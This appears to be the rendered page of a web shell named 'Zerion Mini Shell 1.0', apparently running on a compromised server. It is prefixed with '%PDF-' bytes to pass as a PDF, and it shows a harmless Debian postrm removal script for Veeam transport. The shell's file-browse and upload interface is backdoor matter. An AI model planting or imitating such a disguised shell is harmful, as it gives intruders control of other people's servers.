%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/lib/dpkg/info/
Upload File :
Create Path :
Current File : /var/lib/dpkg/info/veeamtransport.postrm

#!/bin/sh

set -e

INSTALL_DIR=/opt/veeam/transport

case "$1" in
    remove)
    ;;

    purge)
        rm -rf ${INSTALL_DIR}
    ;;

    upgrade|failed-upgrade|abort-upgrade|abort-install|disappear)
    ;;


    *)
        echo "postrm called with unknown argument \`$1'" >&2
        exit 1
    ;;
esac

exit 0

Zerion Mini Shell 1.0